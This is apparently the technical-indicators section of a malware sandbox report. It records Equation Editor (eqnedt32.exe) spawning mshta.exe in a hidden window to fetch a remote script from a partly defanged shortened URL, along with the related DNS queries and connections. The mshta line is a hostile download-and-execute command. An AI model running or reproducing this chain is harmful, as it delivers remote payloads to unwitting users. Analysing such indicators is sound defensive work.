Technical Information
- '%WINDIR%\syswow64\mshta.exe' http://bi#.ly/2QjTp4j &AAAAAAAAAAAAAAAC
- 'bi#.ly':80
- 'bi##y.com':443
- 'bi##y.com':443
- DNS ASK bi#.ly
- DNS ASK bi##y.com
- '%WINDIR%\syswow64\mshta.exe' http://bi#.ly/2QjTp4j &AAAAAAAAAAAAAAAC' (with hidden window)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding